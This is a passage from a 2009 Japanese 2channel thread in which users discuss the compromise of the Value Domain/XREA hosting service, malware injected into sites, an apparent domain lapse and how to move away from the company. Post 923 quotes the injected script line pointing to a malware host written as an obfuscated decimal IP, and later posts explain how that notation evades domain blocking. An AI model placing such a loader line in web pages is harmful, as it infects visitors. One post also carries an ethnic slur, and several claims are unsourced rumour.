まだ連絡するとコピペしてくる事務員レベルじゃ把握出来てないのか、終わってるね。
事務員のPCも感染して管理パスも抜かれてそう。
922名無しさん@お腹いっぱい。:2009/07/09(木) 09:06:00 0
とりあえずMSが正式対応してくれたら即ログインして移管できるドメインは全部移管
したいんだけど、MSの正式対応はまだ先かなぁ・・・
923名無しさん@お腹いっぱい。:2009/07/09(木) 09:13:50 0
js.src =”http://1856317799:888/jp.js”;
↑いまこれ死んでるな

http://110.165.41.103/
これのレスポンスがこれ

HTTP/1.1 200 OK
Content-Length: 4
Content-Type: text/html
Content-Location: http://110.165.41.103:80/index.htm
Last-Modified: Sat, 27 Jun 2009 06:31:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Date: Thu, 09 Jul 2009 00:06:24 GMT
Connection: close

fuck

最後の一行がふざけている
924名無しさん@お腹いっぱい。:2009/07/09(木) 09:18:36 0
>>923
ちょw最後の一行はなんだよwww洒落になんねー
925名無しさん@お腹いっぱい。:2009/07/09(木) 09:23:14 0
すまん、レスポンスのhttp全角にするの忘れた
926名無しさん@お腹いっぱい。:2009/07/09(木) 09:24:20 0
このサーバは昔からずっとこのレスポンスだよな
有名どころだし
927名無しさん@お腹いっぱい。:2009/07/09(木) 09:24:40 0
ふつうに .../jp.js とれたよ ざっと見昨日と変化なし

いや、ま…ふつうにhttpの本文…w
928名無しさん@お腹いっぱい。:2009/07/09(木) 09:27:16 O
個人情報消しときたいが、これじゃ怖くてログインもできんな
クレカ情報とか入れてないだけマシか……
929名無しさん@お腹いっぱい。:2009/07/09(木) 09:27:25 0
まさか、2chを見てる社員が一人もいなくて、この事態を知らないのか?w
930名無しさん@お腹いっぱい。:2009/07/09(木) 09:31:05 0
>>787
あほか
一番左は勝手にカードから金を抜く業者だぞw
931名無しさん@お腹いっぱい。:2009/07/09(木) 09:33:16 P
>>923
なんか変わったな。
昨日はfuzz...みたいなのが書いてあった
932名無しさん@お腹いっぱい。:2009/07/09(木) 09:35:40 0
>>929
それは200%ないw
デジロ社員は関連スレ全部、常時監視してるからそんな事は絶対ないよw

>>930
何故ここにきてそのロングパスw
933名無しさん@お腹いっぱい。:2009/07/09(木) 09:39:02 0
>>927
そうか。
こっちはお手製のhttpクライアントなので、
User-Agentを設定していないのが原因かも。
934名無しさん@お腹いっぱい。:2009/07/09(木) 09:43:33 O
隠蔽するなら、
俺が実名出して証人になってやる。
935名無しさん@お腹いっぱい。:2009/07/09(木) 09:44:51 0
>>931
それはたぶん888ポート
80ポートだとfuckって返ってくる
936名無しさん@お腹いっぱい。:2009/07/09(木) 09:47:37 0
ここって、去年、XREAの広告改ざんのときと同じウイルスサーバじゃん
1年たっても何もかわってないんだな
937名無しさん@お腹いっぱい。:2009/07/09(木) 09:48:22 0
http://16304890800/

これでヤフーになるのかw
これじゃドメインのブロックはできねえ
938名無しさん@お腹いっぱい。:2009/07/09(木) 09:50:16 0
症状も同じだし、やっぱこれ新種のトロイが追加されただけで攻撃手法は1年前と何も変わってないな
939名無しさん@お腹いっぱい。:2009/07/09(木) 10:10:18 0
ここって2年前位に中の人がさくらに移籍したって話きいたけど、その前後から悪くなった?
940名無しさん@お腹いっぱい。:2009/07/09(木) 10:10:28 0
>>938
だとしたら、前回の見解と同じ、保守管理を依頼していたシナ人集団がまた悪さしたってことになるがw
941名無しさん@お腹いっぱい。:2009/07/09(木) 10:14:44 0
まだログインしたら危ない?
942名無しさん@お腹いっぱい。:2009/07/09(木) 10:23:24 0
これ、マジで?
今の中の人って完全に入れ替わってる?

295 :名無し~3.EXE [sage] :2009/07/09(木) 10:15:08 ID:HdBV/77A (2/2)
大阪なのはドメイン代行業者

Google で検索かけると一時期ヤフオクに権利譲渡とかで出品してたらしい
943名無しさん@お腹いっぱい。:2009/07/09(木) 10:44:06 0
>>942
コピペ元ぐらい書けよ
944名無しさん@お腹いっぱい。:2009/07/09(木) 10:48:58 0
ソース皆無の又聞きの又聞きの…
945名無しさん@お腹いっぱい。:2009/07/09(木) 10:56:40 0
弊社サービス上の個人情報の取り扱いについて

当社は、個人情報保護法、および、関連する法令・規範を遵守します。
個人情報保護に関する管理体制を確立するとともに、当社規程を役員および従業員に周知し、その遵守を徹底いたします。
また、個人情報をお客様に明示した利用目的の範囲内で取り扱います。
また、お客様の同意がある場合または正当な理由がある場合を除き、第三者に開示または提供しません。
さらに、個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。
また、お客様からの個人情報に関するお問い合わせ、開示等のご請求に誠実に対応します。



個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。
個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。
個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。
個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。
個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。
946名無しさん@お腹いっぱい。:2009/07/09(木) 11:17:25 0
ネトゲのmabinogiアカハックもwikiwiki.jpのせいと言うことで、やっとゲーム公式フォーラムで顛末垂れ込みされたようだ
ttp://www.mabinogi.jp/6th/community/freeBoardContent.asp?dp=0&th=74915999&ix=74915
947名無しさん@お腹いっぱい。:2009/07/09(木) 12:07:26 0
今回の件でドメイン移管しようと思うのだが、
調べてみると移管に関してキャンペーンしている業者発見!!

今回の件で得をするのはこの業者か...
変に勘ぐりたくはないが、タイミングよすぎ。
948名無しさん@お腹いっぱい。:2009/07/09(木) 12:07:36 0
こりゃ次スレはテンプレにURLを書いてもらえない
哀れな鯖屋スレになりそうだな
949名無しさん@お腹いっぱい。:2009/07/09(木) 13:08:15 0
テンプレにURLかかれると、ウイルスコピペの可能性があるから困ることになるな
せめて全角にしようぜ
950名無しさん@お腹いっぱい。:2009/07/09(木) 13:09:04 0
1856317799=0x6EA52967、FC2ブログにも来たようだ。
ttp://dubai.2ch.net/test/read.cgi/ogame/1245761603/560-564
サーバ丸ごとというよりはパス抜かれた特定のブログに
勝手にログインされて改竄されたっぽいけど。
951名無しさん@お腹いっぱい。:2009/07/09(木) 13:24:47 0
>>950
今は閉鎖中
952名無しさん@お腹いっぱい。:2009/07/09(木) 13:58:31 0
ウイルス騒ぎと関係ないのですがドメイン期限切れをまたやらかしました
CORESERVER利用者向け coresv.com および coresv.net
953名無しさん@お腹いっぱい。:2009/07/09(木) 14:02:41 0
ドメイン切れwwwwwwww
whoisしてみたら普通にerror返ってくるね

崩壊がとまらないな
どうすんのこれ
954名無しさん@お腹いっぱい。:2009/07/09(木) 14:12:25 0
以前もあったの?こんなドメイン切れが・・・。
955名無しさん@お腹いっぱい。:2009/07/09(木) 14:14:02 0
ドメイン切れるってことは担当者が引き継ぎしないでやめたんだろうな
956名無しさん@お腹いっぱい。:2009/07/09(木) 14:15:11 P
ん、何かおかしくない?
期限切れてないはずだけど。

ttp://whois.domaintools.com/coresv.com
ttp://whois.domaintools.com/coresv.net

> Created: 2006-07-07
> Expires: 2010-07-07
> Updated: 2009-07-08
957名無しさん@お腹いっぱい。:2009/07/09(木) 14:15:23 0
>>952
ワロタ

いやこれもう笑うしかないだろ…
958名無しさん@お腹いっぱい。:2009/07/09(木) 14:15:52 P
ドメイン切れは前にもあっただろ
俺の記憶にあるのは1回だけど他にもあるかもしれないな
残高不足といいドメイン切れといいこれは実際に誰にもすぐわかる事だから言い訳も穏ペイもできないよな
う〜んこれはまじで黄信号から赤信号に変わりかけてるような気がしてきたな
959名無しさん@お腹いっぱい。:2009/07/09(木) 14:17:52 P
あ、切れてからupdateしたのか
960名無しさん@お腹いっぱい。:2009/07/09(木) 14:18:56 0
みたいだね
更新はされてる
961名無しさん@お腹いっぱい。:2009/07/09(木) 14:19:06 0
もしかしなくても今もの凄いヤバイ状況になってるの、俺ら?
レジストラ兼鯖屋がハクられたら管理してる全てのサイトが
存在そのものまで好き勝手に弄られちゃうってことだろ。
住基ネットにフルアクセスできる端末が中国に置かれてるようなもんじゃん。
962名無しさん@お腹いっぱい。:2009/07/09(木) 14:24:04 O
規約内には、「あらゆる非常事態でドメインがどうなっても、責任は一切とらんぞボケ!」と書いてあるから、ドメイン乗っ取りがあっても、後の祭りだな。こりゃ。
963名無しさん@お腹いっぱい。:2009/07/09(木) 14:28:49 O
いや、失効していてもWHOIS上の期限だけ伸びる場合があるので油断はできない
964名無しさん@お腹いっぱい。:2009/07/09(木) 14:36:17 0
>>962
その規約は無効だよ。
無茶苦茶な規約作って利用者が承認して契約しても、
契約自体に違法性があった場合は裁判になったら確実に負ける。
会社が個別に作った規約よりも国が作った法律の方が強いってことだ。
965名無しさん@お腹いっぱい。:2009/07/09(木) 14:37:12 0
俺ルールですね
966名無しさん@お腹いっぱい。:2009/07/09(木) 14:49:57 0
そろそろサポートのおばちゃんの出番だな。
967名無しさん@お腹いっぱい。:2009/07/09(木) 14:53:38 0
co.jp
をVDが扱っていなくて良かったorz
968名無しさん@お腹いっぱい。:2009/07/09(木) 15:16:04 O
ひとつ明確になったのは、
リスクマネージメントが全くなってない糞会社だってことだな。
969名無しさん@お腹いっぱい。:2009/07/09(木) 15:27:16 0
VDは安いからなぁ・・・VD以外で安い所は・・・ムームーとかFC2か?
970名無しさん@お腹いっぱい。:2009/07/09(木) 15:27:30 0
関連サービスのドメイン失効は今年2月の大障害の時にもタイミング同じくしてやらかしてるじゃん。

特に去年の広告鯖ウイルス事件以降、ここの崩壊具合はちょっと酷いよ。
度を越してる。
回を増すごとにひどくなってるからねw
971名無しさん@お腹いっぱい。:2009/07/09(木) 15:28:35 P
>>967
数年前「属性型・地域型も移管なら対応できる」と聞いて特攻してった人がいたような・・・
972名無しさん@お腹いっぱい。:2009/07/09(木) 15:29:13 0
>952の有効期限切れについてもアナウンスしないんだろうな。
973名無しさん@お腹いっぱい。:2009/07/09(木) 15:32:53 0
あの…
VDネームサーバがほぼ機能してない障害が5月末からずっと続いてる件については…
974名無しさん@お腹いっぱい。:2009/07/09(木) 15:47:21 0
全部まとめて完全放置
で公式アナウンスも従来通り一切しません
975名無しさん@お腹いっぱい。:2009/07/09(木) 15:50:31 0
完璧だw
976名無しさん@お腹いっぱい。:2009/07/09(木) 15:50:51 0
ネームサーバ機能してると思うけど違うの?
977名無しさん@お腹いっぱい。:2009/07/09(木) 15:54:28 0
どこのnamedがいかれたのか、詳細希望。
だれかdigしたもんください。
978名無しさん@お腹いっぱい。:2009/07/09(木) 15:54:36 P
総務省に苦情や相談をすれば、改善される見込みはある?
979名無しさん@お腹いっぱい。:2009/07/09(木) 15:56:28 0
>>977
社員乙
980名無しさん@お腹いっぱい。:2009/07/09(木) 16:01:34 0
>>978
総務省に苦情や相談をすれば、夜逃げされる見込みはある。
981名無しさん@お腹いっぱい。:2009/07/09(木) 16:04:21 0
ns3がちょっとレスポンス悪いけど機能してるぞ
982名無しさん@お腹いっぱい。:2009/07/09(木) 16:06:23 0
ax.xrea.com 24時間放置あげ

983名無しさん@お腹いっぱい。:2009/07/09(木) 16:06:56 P
>>980
ってことは、苦情・相談はしないほうがいいのか。
なんだかなあ。
984名無しさん@お腹いっぱい。:2009/07/09(木) 16:06:57 0
記念ばりゅこ

崩壊の軌跡をまとめたサイトはないの?
985名無しさん@お腹いっぱい。:2009/07/09(木) 16:12:31 0
いったいいつまで放置プレイするんだろう。
中の人がパス変えられてしまって入れないとかあったらみんな楽しいなw
986名無しさん@お腹いっぱい。:2009/07/09(木) 16:15:32 0
>>937
16304890800
これでどうしてYahooになるのか知りたい。
どっかいじられてるの?
987名無しさん@お腹いっぱい。:2009/07/09(木) 16:16:35 0
>>986
どんだけ馬鹿なんだよ
988名無しさん@お腹いっぱい。:2009/07/09(木) 16:17:29 0
>>983
うちは2ヶ月前に移転済みだから苦情・相談で夜逃げされても困らない。
ここまで放置するくらいだから指導されてもなにも対処しないと思う。
989名無しさん@お腹いっぱい。:2009/07/09(木) 16:20:21 P
>>986
このスレ全部見れば答えが分かるよ。

>>988
そうなんだけど、何もしないよりいいかなと思って。
むこうのペースに合わせざるを得ない現状がはがゆくてさ。
990名無しさん@お腹いっぱい。:2009/07/09(木) 16:21:41 0
>>986
ロングipアドレス でググれカス
991名無しさん@お腹いっぱい。:2009/07/09(木) 16:28:38 0
>>989
IPAとか国民生活センターでもいいかもね
992名無しさん@お腹いっぱい。:2009/07/09(木) 16:31:32 0
IPAはないだろw
岡ちゃんがやってくるぞwwwwwwww
993名無しさん@お腹いっぱい。:2009/07/09(木) 16:31:46 0
次スレ御願い
994名無しさん@お腹いっぱい。:2009/07/09(木) 16:41:58 0
次スレも何日もつか・・・
更なるハード調教が待ってる気がする
995名無しさん@お腹いっぱい。:2009/07/09(木) 16:51:04 0
>>992
まあアレは失態だったと思うけどほかの人たちはがんばってるんで・・・
ここでそういう反応返ってくるとはおもわんかった
996名無しさん@お腹いっぱい。:2009/07/09(木) 16:54:20 0
改竄に関するお知らせとお詫び
ttp://wikiwiki.jp/?Notice%2F2009-07-09
WIKIWIKI.jpはアナウンス出したけど、デジロはどうかな?
997名無しさん@お腹いっぱい。:2009/07/09(木) 17:02:07 0
次スレ
VALUE DOMAINってどうよ? part34
http://pc11.2ch.net/test/read.cgi/hosting/1247126261/
998名無しさん@お腹いっぱい。:2009/07/09(木) 17:03:12 0
>>997
まじお疲れ様。立ててくれてありがとう。
999名無しさん@お腹いっぱい。:2009/07/09(木) 17:07:06 P
おつおつ
1000名無しさん@お腹いっぱい。:2009/07/09(木) 17:07:32 0
>>1000なら倒産
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。